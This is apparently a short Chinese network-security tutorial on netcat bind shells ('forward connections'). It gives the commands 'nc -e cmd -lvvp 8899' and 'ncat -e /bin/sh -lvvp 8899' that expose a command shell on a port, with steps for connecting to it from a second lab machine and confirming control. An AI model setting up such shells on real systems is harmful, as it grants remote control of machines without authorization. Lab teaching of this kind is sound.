一、正向连接,Linux服务器主动控制windows服务器

1、上传nc到windows服务器上运行

2、以管理员身份运行cmd

2023网络安全 -- 正向连接_服务器

3、执行下面命令,监听任意来自8899端口的数据

nc -e cmd -lvvp 8899

2023网络安全 -- 正向连接_windows服务_02

4、Linux服务器执行如下命令,ip地址为windows服务器的地址

ncat 192.168.1.188 8899

2023网络安全 -- 正向连接_服务器_03

5、whoami查看当前主机名称,已获取windows服务器权限

2023网络安全 -- 正向连接_主机名_04

6、此时windows服务器也会获取相关信息

2023网络安全 -- 正向连接_主机名_05


二、正向连接,windows服务器主动控制Linux服务器

1、Linux服务器运行下面命令绑定端口

ncat -e /bin/sh -lvvp 8899

2023网络安全 -- 正向连接_服务器_06

2、windows服务器去连接Linux服务器,

nc 192.168.1.108 8899

3、成功执行Linux相关命令,说明已经可控制Linux服务器

2023网络安全 -- 正向连接_服务器_07